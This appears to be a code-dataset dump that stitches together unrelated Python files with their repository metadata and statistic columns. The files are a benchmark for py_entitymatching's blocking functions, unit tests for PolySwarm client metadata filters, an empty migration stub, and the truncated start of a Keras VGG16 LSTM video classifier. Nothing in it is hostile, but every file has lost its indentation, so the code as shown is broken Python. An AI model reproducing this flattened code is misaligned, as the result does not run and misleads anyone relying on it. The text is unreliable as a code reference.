mvahit/py_entitymatching
|
6724081d7d95c547e5a51625b4a8207c6c1737f8
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 53
|
2016-09-22T02:07:34.000Z
|
2022-03-19T18:57:06.000Z
|
# Write the benchmarking functions here.
# See "Writing benchmarks" in the asv docs for more information.
import os
import sys
import py_entitymatching as mg
p = mg.get_install_path()
datasets_path = os.sep.join([p, 'datasets', 'example_datasets'])
snb = mg.SortedNeighborhoodBlocker()
class TimeBlockTablesAnime:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'anime', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'anime', 'B.csv'])
self.l_block_attr = 'Year'
self.r_block_attr = 'Year'
self.l_output_attrs = ['Title', 'Year', 'Episodes']
self.r_output_attrs = ['Title', 'Year', 'Episodes']
try:
self.A = mg.read_csv_metadata(path_for_A)
mg.set_key(self.A, 'ID')
self.B = mg.read_csv_metadata(path_for_B)
mg.set_key(self.B, 'ID')
except AssertionError:
print("Dataset \'anime\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
def time_block_tables(self):
snb.block_tables(self.A, self.B, self.l_block_attr,
self.r_block_attr, self.l_output_attrs,
self.r_output_attrs)
def teardown(self):
del self.A
del self.B
del self.l_block_attr
del self.r_block_attr
del self.l_output_attrs
del self.r_output_attrs
class TimeBlockTablesBikes:
def setup(self):
p = mg.get_install_path()
path_for_A = os.sep.join([datasets_path, 'bikes', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'bikes', 'B.csv'])
try:
self.A = mg.read_csv_metadata(path_for_A)
mg.set_key(self.A, 'id')
self.B = mg.read_csv_metadata(path_for_B)
mg.set_key(self.B, 'id')
except AssertionError:
print("Dataset \'bikes\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
self.l_block_attr = 'city_posted'
self.r_block_attr = 'city_posted'
self.l_output_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
'color', 'model_year']
self.r_output_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
'color', 'model_year']
def time_block_tables(self):
snb.block_tables(self.A, self.B, self.l_block_attr,
self.r_block_attr, self.l_output_attrs,
self.r_output_attrs)
def teardown(self):
del self.A
del self.B
del self.l_block_attr
del self.r_block_attr
del self.l_output_attrs
del self.r_output_attrs
class TimeBlockTablesBooks:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'books', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'books', 'B.csv'])
self.l_block_attr = 'Author'
self.r_block_attr = 'Author'
self.l_output_attrs = ['Title', 'Author', 'ISBN13', 'Publisher',
'Publication_Date']
self.r_output_attrs = ['Title', 'Author', 'ISBN13', 'Publisher',
'Publication_Date']
try:
self.A = mg.read_csv_metadata(path_for_A)
mg.set_key(self.A, 'ID')
self.B = mg.read_csv_metadata(path_for_B)
mg.set_key(self.B, 'ID')
except AssertionError:
print("Dataset \'books\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
def time_block_tables(self):
snb.block_tables(self.A, self.B, self.l_block_attr,
self.r_block_attr, self.l_output_attrs,
self.r_output_attrs)
def teardown(self):
del self.A
del self.B
del self.l_block_attr
del self.r_block_attr
del self.l_output_attrs
del self.r_output_attrs
class TimeBlockTablesCitations:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'citations', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'citations', 'B.csv'])
self.l_block_attr = 'year'
self.r_block_attr = 'year'
self.l_output_attrs = ['title', 'author', 'year', 'ENTRYTYPE']
self.r_output_attrs = ['title', 'author', 'year', 'ENTRYTYPE']
try:
self.A = mg.read_csv_metadata(path_for_A)
mg.set_key(self.A, 'ID')
self.B = mg.read_csv_metadata(path_for_B)
mg.set_key(self.B, 'ID')
except AssertionError:
print("Dataset \'citations\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
def time_block_tables(self):
snb.block_tables(self.A, self.B, self.l_block_attr,
self.r_block_attr, self.l_output_attrs,
self.r_output_attrs)
def teardown(self):
del self.A
del self.B
del self.l_block_attr
del self.r_block_attr
del self.l_output_attrs
del self.r_output_attrs
class TimeBlockTablesElectronics:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'electronics', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'electronics', 'B.csv'])
self.l_block_attr = 'Brand'
self.r_block_attr = 'Brand'
self.l_output_attrs = ['Brand', 'Amazon_Price']
self.r_output_attrs = ['Brand', 'Price']
try:
self.A = mg.read_csv_metadata(path_for_A)
mg.set_key(self.A, 'ID')
self.B = mg.read_csv_metadata(path_for_B)
mg.set_key(self.B, 'ID')
except AssertionError:
print("Dataset \'electronics\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
def time_block_tables(self):
snb.block_tables(self.A, self.B, self.l_block_attr,
self.r_block_attr, self.l_output_attrs,
self.r_output_attrs)
def teardown(self):
del self.A
del self.B
del self.l_block_attr
del self.r_block_attr
del self.l_output_attrs
del self.r_output_attrs
class TimeBlockTablesRestaurants:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'restaurants', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'restaurants', 'B.csv'])
self.l_block_attr = 'PHONENUMBER'
self.r_block_attr = 'PHONENUMBER'
self.l_output_attrs = ['NAME', 'PHONENUMBER', 'ADDRESS']
self.r_output_attrs = ['NAME', 'PHONENUMBER', 'ADDRESS']
try:
self.A = mg.read_csv_metadata(path_for_A)
mg.set_key(self.A, 'ID')
self.B = mg.read_csv_metadata(path_for_B)
mg.set_key(self.B, 'ID')
except AssertionError:
print("Dataset \'restaurants\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
def time_block_tables(self):
snb.block_tables(self.A, self.B, self.l_block_attr,
self.r_block_attr, self.l_output_attrs,
self.r_output_attrs)
def teardown(self):
del self.A
del self.B
del self.l_block_attr
del self.r_block_attr
del self.l_output_attrs
del self.r_output_attrs
class TimeBlockCandsetAnime:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'anime', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'anime', 'B.csv'])
try:
A = mg.read_csv_metadata(path_for_A)
mg.set_key(A, 'ID')
B = mg.read_csv_metadata(path_for_B)
mg.set_key(B, 'ID')
self.C = snb.block_tables(A, B, 'Year', 'Year',
['Title', 'Year', 'Episodes'],
['Title', 'Year', 'Episodes'])
except AssertionError:
print("Dataset \'anime\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
self.l_block_attr = 'Episodes'
self.r_block_attr = 'Episodes'
def time_block_candset(self):
snb.block_candset(self.C, self.l_block_attr, self.r_block_attr)
def teardown(self):
del self.C
del self.l_block_attr
del self.r_block_attr
class TimeBlockCandsetBikes:
timeout = 300.0
def setup(self):
path_for_A = os.sep.join([datasets_path, 'bikes', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'bikes', 'B.csv'])
try:
A = mg.read_csv_metadata(path_for_A)
mg.set_key(A, 'id')
B = mg.read_csv_metadata(path_for_B)
mg.set_key(B, 'id')
l_output_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
'color', 'model_year']
r_output_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
'color', 'model_year']
self.C = snb.block_tables(A, B, 'city_posted', 'city_posted',
l_output_attrs, r_output_attrs)
except AssertionError:
print("Dataset \'bikes\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
self.l_block_attr = 'model_year'
self.r_block_attr = 'model_year'
def time_block_candset(self):
snb.block_candset(self.C, self.l_block_attr, self.r_block_attr)
def teardown(self):
del self.C
del self.l_block_attr
del self.r_block_attr
class TimeBlockCandsetBooks:
def setup(self):
path_for_A = os.sep.join([datasets_path, 'books', 'A.csv'])
path_for_B = os.sep.join([datasets_path, 'books', 'B.csv'])
try:
A = mg.read_csv_metadata(path_for_A)
mg.set_key(A, 'ID')
B = mg.read_csv_metadata(path_for_B)
mg.set_key(B, 'ID')
self.C = snb.block_tables(A, B, 'Author', 'Author',
['Title', 'Author', 'ISBN13', 'Publisher'],
['Title', 'Author', 'ISBN13', 'Publisher'])
except AssertionError:
print("Dataset \'books\' not found. Please visit the project"
" website to download the dataset.")
raise SystemExit
self.l_block_attr = 'ISBN13'
self.r_block_attr = 'ISBN13'
def time_block_candset(self):
snb.block_candset(self.C, self.l_block_attr, self.r_block_attr)
def teardown(self):
del self.C
del self.l_block_attr
del self.r_block_attr
| 36.650165
| 80
| 0.571274
| 1,439
| 11,105
| 4.134816
| 0.076442
| 0.081681
| 0.045378
| 0.063529
| 0.861345
| 0.826218
| 0.795798
| 0.792941
| 0.775462
| 0.775462
| 0
| 0.002112
| 0.317785
| 11,105
| 302
| 81
| 36.771523
| 0.783263
| 0.012697
| 0
| 0.733333
| 0
| 0
| 0.159931
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 1
| 0.105882
| false
| 0
| 0.011765
| 0
| 0.156863
| 0.035294
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91476207a7c09f973c95be7dbe81a89a6b95a7fd
| 19,505
|
py
|
Python
|
tests/test_filter.py
|
polyswarm/polyswarm-client
|
1ce057725d7db59c3582e4cd3cf148cde7ddddeb
|
[
"MIT"
] | 21
|
2018-09-15T00:12:42.000Z
|
2020-10-28T00:42:59.000Z
|
tests/test_filter.py
|
polyswarm/polyswarm-client
|
1ce057725d7db59c3582e4cd3cf148cde7ddddeb
|
[
"MIT"
] | 435
|
2018-09-05T18:53:21.000Z
|
2021-11-30T17:32:10.000Z
|
tests/test_filter.py
|
polyswarm/polyswarm-client
|
1ce057725d7db59c3582e4cd3cf148cde7ddddeb
|
[
"MIT"
] | 3
|
2019-07-26T00:14:47.000Z
|
2021-04-26T10:57:56.000Z
|
from polyswarmclient.filters.bountyfilter import BountyFilter, split_filter
from polyswarmclient.filters.confidencefilter import ConfidenceModifier
from polyswarmclient.filters.filter import Filter, FilterComparison, parse_filters, MetadataFilter
def test_pad_fills_empty_to_length():
# arrange
metadata = []
# act
padded = MetadataFilter.pad_metadata(metadata, 2)
# assert
assert padded == [{}] * 2
# noinspection PyTypeChecker
def test_pad_fills_none_to_length():
# arrange
metadata = None
# act
padded = MetadataFilter.pad_metadata(metadata, 2)
# assert
assert padded == [{}] * 2
def test_pad_fills_to_length():
# arrange
metadata = [{'mimetype': 'text/plain'}]
# act
padded = MetadataFilter.pad_metadata(metadata, 2)
# assert
assert padded == [{'mimetype': 'text/plain'}, {}]
def test_pad_fills_with_none_on_invalid_metadata():
# arrange
metadata = [{'asdf': 'asdf'}]
# act
padded = MetadataFilter.pad_metadata(metadata, 2)
# assert
assert padded == [{}] * 2
def test_no_pad_on_match_length():
# arrange
metadata = [{'mimetype': 'text/plain'}] * 5
# act
padded = MetadataFilter.pad_metadata(metadata, 5)
# assert
assert padded == metadata
def test_no_pad_on_too_long():
# arrange
metadata = [{'mimetype': 'text/plain'}] * 10
# act
padded = MetadataFilter.pad_metadata(metadata, 5)
# assert
assert padded == metadata
def test_not_excluded():
# arrange
bounty_filter = BountyFilter(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
# act
allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
# assert
assert allowed
def test_excluded():
# arrange
bounty_filter = BountyFilter(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
# act
allowed = bounty_filter.is_allowed({'mimetype': 'text/plain'})
# assert
assert not allowed
def test_any_excluded():
# arrange
bounty_filter = BountyFilter(None, [
Filter('mimetype', FilterComparison.EQ, 'text/plain'),
Filter('mimetype', FilterComparison.EQ, 'text/html')])
# act
allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
# assert
assert not allowed
def test_not_accepted():
# arrange
bounty_filter = BountyFilter([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
# act
allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
# assert
assert not allowed
def test__accepted():
# arrange
bounty_filter = BountyFilter([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
# act
allowed = bounty_filter.is_allowed({'mimetype': 'text/plain'})
# assert
assert allowed
def test_scans_artifact_accepted_match_only_one():
# arrange
bounty_filter = BountyFilter([Filter('mimetype', FilterComparison.EQ, 'text/plain'),
Filter('mimetype', FilterComparison.EQ, 'text/html')],
None)
# act
allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
# assert
assert allowed
def test_not_penlized():
# arrange
bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
# act
confidence = bounty_filter.modify({'mimetype': 'text/html'}, 1.0)
# assert
assert confidence == 1.0
def test_penalized():
# arrange
bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain'}, 1.0)
# assert
assert confidence == 0.8
def test_multiple_penalized():
# arrange
bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain'),
Filter('filesize', FilterComparison.LT, '68')])
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain', 'filesize': '21'}, 1.0)
# assert
assert confidence == 0.8
def test_penalized_other_value():
# arrange
bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain'}, .5)
# assert
assert confidence == .4
def test_not_favored():
# arrange
bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
# act
confidence = bounty_filter.modify({'mimetype': 'text/html'}, 1.0)
# assert
assert confidence == 1.0
def test_favored():
# arrange
bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain'}, 1.0)
# assert
assert confidence == 1.2
def test_favored_other_value():
# arrange
bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain'}, .5)
# assert
assert confidence == .6
def test_multiple_favored():
# arrange
bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain'),
Filter('filesize', FilterComparison.LT, '68')],
None)
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain', 'filesize': '21'}, 1.0)
# assert
assert confidence == 1.2
def test_offset():
# arrange
bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')],
[Filter('filesize', FilterComparison.LT, '68')])
# act
confidence = bounty_filter.modify({'mimetype': 'text/plain', 'filesize': '21'}, 1.0)
# assert
assert confidence == 1.0
def test_split_filter_becomes_filter():
# arrange
# assert
text_filter = split_filter(None, None, ['mimetype:text/plain'])
# act
assert text_filter[0] == Filter('mimetype', FilterComparison.EQ, 'text/plain')
def test_split_filter_empty_stays_empty():
# arrange
# assert
text_filter = split_filter(None, None, [])
# act
assert not text_filter
def test_parse_filter_adds_reject():
# arrange
# assert
filters = parse_filters(None, None, [('reject', 'mimetype', 'contains', 'text')])
# act
assert not filters.get('accept', None)
assert filters['reject'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
def test_parse_filter_adds_accept():
# arrange
# assert
filters = parse_filters(None, None, [('accept', 'mimetype', 'contains', 'text')])
# act
assert filters['accept'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
assert not filters.get('reject', None)
def test_parse_filter_adds_both_accept_and_reject():
# arrange
# assert
filters = parse_filters(None, None, [('reject', 'mimetype', 'contains', 'text'),
('accept', 'mimetype', 'contains', 'pdf')])
# act
assert filters['accept'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'pdf')
assert filters['reject'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
def test_parse_filter_adds_favor():
# arrange
# assert
filters = parse_filters(None, None, [('favor', 'mimetype', 'contains', 'text')])
# act
assert filters['favor'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
assert not filters.get('penalize', None)
def test_parse_filter_adds_penalize():
# arrange
# assert
filters = parse_filters(None, None, [('penalize', 'mimetype', 'contains', 'text')])
# act
assert not filters.get('favor', None)
assert filters['penalize'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
def test_parse_filter_adds_both_favor_and_penalize():
# arrange
# assert
filters = parse_filters(None, None, [('favor', 'mimetype', 'contains', 'text'),
('penalize', 'mimetype', 'contains', 'pdf')])
# act
assert filters['favor'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
assert filters['penalize'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'pdf')
def test_parse_filter_returns_empty_lists_on_none():
# arrange
# assert
filters = parse_filters(None, None, None)
# act
assert isinstance(filters.get('accept', []), list) and len(filters.get('accept', [])) == 0
assert isinstance(filters.get('reject', []), list) and len(filters.get('reject', [])) == 0
def test_parse_filter_returns_empty_lists_on_empty_list():
# arrange
# assert
filters = parse_filters(None, None, [])
# act
assert isinstance(filters.get('accept', []), list) and len(filters.get('accept', [])) == 0
assert isinstance(filters.get('reject', []), list) and len(filters.get('reject', [])) == 0
def test_filter_comparison_from_lt():
# arrange
# assert
comparison = FilterComparison.from_string('<')
# act
assert comparison == FilterComparison.LT
def test_filter_comparison_from_lte():
# arrange
# assert
comparison = FilterComparison.from_string('<=')
# act
assert comparison == FilterComparison.LTE
def test_filter_comparison_from_gt():
# arrange
# assert
comparison = FilterComparison.from_string('>')
# act
assert comparison == FilterComparison.GT
def test_filter_comparison_from_gte():
# arrange
# assert
comparison = FilterComparison.from_string('>=')
# act
assert comparison == FilterComparison.GTE
def test_filter_comparison_from_eq():
# arrange
# assert
comparison = FilterComparison.from_string('==')
# act
assert comparison == FilterComparison.EQ
def test_filter_comparison_from_contains():
# arrange
# assert
comparison = FilterComparison.from_string('contains')
# act
assert comparison == FilterComparison.CONTAINS
def test_filter_comparison_from_startswith():
# arrange
# assert
comparison = FilterComparison.from_string('startswith')
# act
assert comparison == FilterComparison.STARTS_WITH
def test_filter_comparison_from_endswith():
# arrange
# assert
comparison = FilterComparison.from_string('endswith')
# act
assert comparison == FilterComparison.ENDS_WITH
def test_filter_comparison_from_regex():
# arrange
# assert
comparison = FilterComparison.from_string('regex')
# act
assert comparison == FilterComparison.REGEX
def test_none_does_not_match():
# arrange
text_filter = Filter('mimetype', FilterComparison.EQ, 'text/plain')
# act
match = text_filter.filter(None)
# assert
assert not match
def test_gt_matches_larger():
# arrange
metadata = {'filesize': '20'}
size_filter = Filter('filesize', FilterComparison.GT, '0')
# act
match = size_filter.filter(metadata)
# assert
assert match
def test_gt_no_match_smaller_same():
# arrange
same = {'filesize': '30'}
smaller = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.GT, '30')
# act
smaller_match = size_filter.filter(smaller)
same_match = size_filter.filter(same)
# assert
assert not smaller_match and not same_match
def test_gt_matches_value_int():
# arrange
metadata = {'filesize': 20}
size_filter = Filter('filesize', FilterComparison.GT, '0')
# act
match = size_filter.filter(metadata)
# assert
assert match
def test_gt_not_match_value_is_string():
# arrange
metadata = {'filesize': 'asdf'}
size_filter = Filter('filesize', FilterComparison.GT, '0')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_gt_not_match_target_is_string():
# arrange
metadata = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.GT, 'asdf')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_gte_matches_larger_and_same():
# arrange
larger = {'filesize': '20'}
same = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.GTE, '0')
# act
larger_match = size_filter.filter(larger)
same_match = size_filter.filter(same)
# assert
assert larger_match and same_match
def test_gte_no_match_smaller():
# arrange
metadata = {'filesize': '20'}
size_filter = Filter('filesize', FilterComparison.GTE, '30')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_gte_not_match_value_is_string():
# arrange
metadata = {'filesize': 'asdf'}
size_filter = Filter('filesize', FilterComparison.GTE, '0')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_gte_not_match_target_is_string():
# arrange
metadata = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.GTE, 'asdf')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_lt_matches_smaller():
# arrange
metadata = {'filesize': '20'}
size_filter = Filter('filesize', FilterComparison.LT, '30')
# act
match = size_filter.filter(metadata)
# assert
assert match
def test_lt_no_match_larger_same():
# arrange
larger = {'filesize': '20'}
same = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.LT, '0')
# act
larger_match = size_filter.filter(larger)
same_match = size_filter.filter(same)
# assert
assert not larger_match and not same_match
def test_lt_not_match_value_is_string():
# arrange
metadata = {'filesize': 'asdf'}
size_filter = Filter('filesize', FilterComparison.LT, '0')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_lt_not_match_target_is_string():
# arrange
metadata = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.LT, 'asdf')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_lte_matches_smaller_and_same():
# arrange
same = {'filesize': '30'}
smaller = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.LTE, '30')
# act
smaller_match = size_filter.filter(smaller)
same_match = size_filter.filter(same)
# assert
assert smaller_match and same_match
def test_lte_no_match_larger():
# arrange
metadata = {'filesize': '20'}
size_filter = Filter('filesize', FilterComparison.LTE, '0')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_lte_not_match_value_is_string():
# arrange
metadata = {'filesize': 'asdf'}
size_filter = Filter('filesize', FilterComparison.LTE, '0')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_lte_not_match_target_is_string():
# arrange
metadata = {'filesize': '0'}
size_filter = Filter('filesize', FilterComparison.LTE, 'asdf')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_eq_matches_same_int_strings():
# arrange
metadata = {'filesize': '2320'}
size_filter = Filter('filesize', FilterComparison.EQ, '2320')
# act
match = size_filter.filter(metadata)
# assert
assert match
def test_eq_matches_same_int():
# arrange
metadata = {'filesize': 2320}
size_filter = Filter('filesize', FilterComparison.EQ, '2320')
# act
match = size_filter.filter(metadata)
# assert
assert match
def test_eq_matches_same_string():
# arrange
metadata = {'filesize': 'asdf'}
size_filter = Filter('filesize', FilterComparison.EQ, 'asdf')
# act
match = size_filter.filter(metadata)
# assert
assert match
def test_eq_no_match_different():
# arrange
metadata = {'filesize': '2320'}
size_filter = Filter('filesize', FilterComparison.EQ, 'asdf')
# act
match = size_filter.filter(metadata)
# assert
assert not match
def test_contains_matches_if_contained():
# arrange
metadata = {'field': 'asdfg'}
contains_filter = Filter('field', FilterComparison.CONTAINS, 'sdf')
# act
match = contains_filter.filter(metadata)
# assert
assert match
def test_contains_no_match_if_not_contained():
# arrange
metadata = {'field': 'asd'}
contains_filter = Filter('field', FilterComparison.CONTAINS, 'asdf')
# act
match = contains_filter.filter(metadata)
# assert
assert not match
def test_contains_ints_match():
# arrange
metadata = {'field': '123'}
contains_filter = Filter('field', FilterComparison.CONTAINS, '2')
# act
match = contains_filter.filter(metadata)
# assert
assert match
def test_startswith_matches_start():
# arrange
metadata = {'field': 'asdfg'}
starts_filter = Filter('field', FilterComparison.STARTS_WITH, 'asdf')
# act
match = starts_filter.filter(metadata)
# assert
assert match
def test_startswith_no_match():
# arrange
metadata = {'field': 'asdfg'}
starts_filter = Filter('field', FilterComparison.STARTS_WITH, 'sdf')
# act
match = starts_filter.filter(metadata)
# assert
assert not match
def test_startswith_ints_match():
# arrange
metadata = {'field': 123}
starts_filter = Filter('field', FilterComparison.STARTS_WITH, '1')
# act
match = starts_filter.filter(metadata)
# assert
assert match
def test_endswith_matches_end():
# arrange
metadata = {'field': 'asdfg'}
ends_filter = Filter('field', FilterComparison.ENDS_WITH, 'sdfg')
# act
match = ends_filter.filter(metadata)
# assert
assert match
def test_endswith_no_match():
# arrange
metadata = {'field': 'asdfg'}
ends_filter = Filter('field', FilterComparison.ENDS_WITH, 'asdf')
# act
match = ends_filter.filter(metadata)
# assert
assert not match
def test_endswith_ints_match():
# arrange
metadata = {'field': 123}
ends_filter = Filter('field', FilterComparison.ENDS_WITH, '23')
# act
match = ends_filter.filter(metadata)
# assert
assert match
def test_regex_matches():
# arrange
metadata = {'field': 'asdf'}
regex_filter = Filter('field', FilterComparison.REGEX, '^a.*f$')
# act
match = regex_filter.filter(metadata)
# assert
assert match
def test_regex_no_match():
# arrange
metadata = {'field': 'sdf'}
regex_filter = Filter('field', FilterComparison.REGEX, 'a.*f')
# act
match = regex_filter.filter(metadata)
# assert
assert not match
def test_regex_ints_match():
# arrange
metadata = {'field': 123}
regex_filter = Filter('field', FilterComparison.REGEX, '.*2.*')
# act
match = regex_filter.filter(metadata)
# assert
assert match
def test_empty_dict_no_match():
# arrange
metadata = {}
regex_filter = Filter('field', FilterComparison.REGEX, '.*2.*')
# act
match = regex_filter.filter(metadata)
# assert
assert not match
def test_array_bad_query():
# arrange
metadata = []
regex_filter = Filter('field', FilterComparison.REGEX, '.*2.*')
# act
match = regex_filter.filter(metadata)
# assert
assert not match
| 26.646175
| 101
| 0.658344
| 2,161
| 19,505
| 5.723276
| 0.060157
| 0.043014
| 0.059508
| 0.065168
| 0.882358
| 0.857536
| 0.786384
| 0.758085
| 0.724693
| 0.702054
| 0
| 0.009852
| 0.214201
| 19,505
| 731
| 102
| 26.682627
| 0.79709
| 0.075365
| 0
| 0.512894
| 0
| 0
| 0.10756
| 0
| 0
| 0
| 0
| 0
| 0.240688
| 1
| 0.217765
| false
| 0
| 0.008596
| 0
| 0.226361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e67864fc9166814c94bc88c30e2788f75e502620
| 22
|
py
|
Python
|
migrations/645-collection-backfill-slugs.py
|
clouserw/zamboni
|
c4a568b69c1613f27da41d46328b2975cbdc1c07
|
[
"BSD-3-Clause"
] | null | null | null |
migrations/645-collection-backfill-slugs.py
|
clouserw/zamboni
|
c4a568b69c1613f27da41d46328b2975cbdc1c07
|
[
"BSD-3-Clause"
] | null | null | null |
migrations/645-collection-backfill-slugs.py
|
clouserw/zamboni
|
c4a568b69c1613f27da41d46328b2975cbdc1c07
|
[
"BSD-3-Clause"
] | null | null | null |
def run():
return
| 7.333333
| 10
| 0.545455
| 3
| 22
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.318182
| 22
| 2
| 11
| 11
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e6a3585de497c5062a7e5e5353825fb9df202c27
| 14,802
|
py
|
Python
|
keras_video_classifier/library/recurrent_networks.py
|
huynhtnhut97/keras-video-classifier
|
3ea6a8d671f3bd3cc8eddef64ad75abc2a2d593a
|
[
"MIT"
] | null | null | null |
keras_video_classifier/library/recurrent_networks.py
|
huynhtnhut97/keras-video-classifier
|
3ea6a8d671f3bd3cc8eddef64ad75abc2a2d593a
|
[
"MIT"
] | null | null | null |
keras_video_classifier/library/recurrent_networks.py
|
huynhtnhut97/keras-video-classifier
|
3ea6a8d671f3bd3cc8eddef64ad75abc2a2d593a
|
[
"MIT"
] | null | null | null |
from keras.layers import Dense, Activation, Dropout, Bidirectional
from keras.layers.recurrent import LSTM
from keras.models import Sequential
from keras.applications.vgg16 import VGG16
from keras.optimizers import SGD
from keras import backend as K
from keras.utils import np_utils
from sklearn.model_selection import train_test_split
from keras.callbacks import ModelCheckpoint
import os
import numpy as np
from keras_video_classifier.library.utility.frame_extractors.vgg16_feature_extractor import extract_vgg16_features_live, \
scan_and_extract_vgg16_features, extract_vgg16_features_live_each_interval
BATCH_SIZE = 64
NUM_EPOCHS = 20
VERBOSE = 1
HIDDEN_UNITS = 512
MAX_ALLOWED_FRAMES = 20
EMBEDDING_SIZE = 100
K.set_image_dim_ordering('tf')
def generate_batch(x_samples, y_samples):
num_batches = len(x_samples) // BATCH_SIZE
while True:
for batchIdx in range(0, num_batches):
start = batchIdx * BATCH_SIZE
end = (batchIdx + 1) * BATCH_SIZE
yield np.array(x_samples[start:end]), y_samples[start:end]
class VGG16BidirectionalLSTMVideoClassifier(object):
model_name = 'vgg16-bidirectional-lstm'
def __init__(self):
self.num_input_tokens = None
self.nb_classes = None
self.labels = None
self.labels_idx2word = None
self.model = None
self.vgg16_model = None
self.expected_frames = None
self.vgg16_include_top = True
self.config = None
def create_model(self):
model = Sequential()
model.add(Bidirectional(LSTM(units=HIDDEN_UNITS, return_sequences=True),
input_shape=(self.expected_frames, self.num_input_tokens)))
model.add(Bidirectional(LSTM(10)))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(self.nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
return model
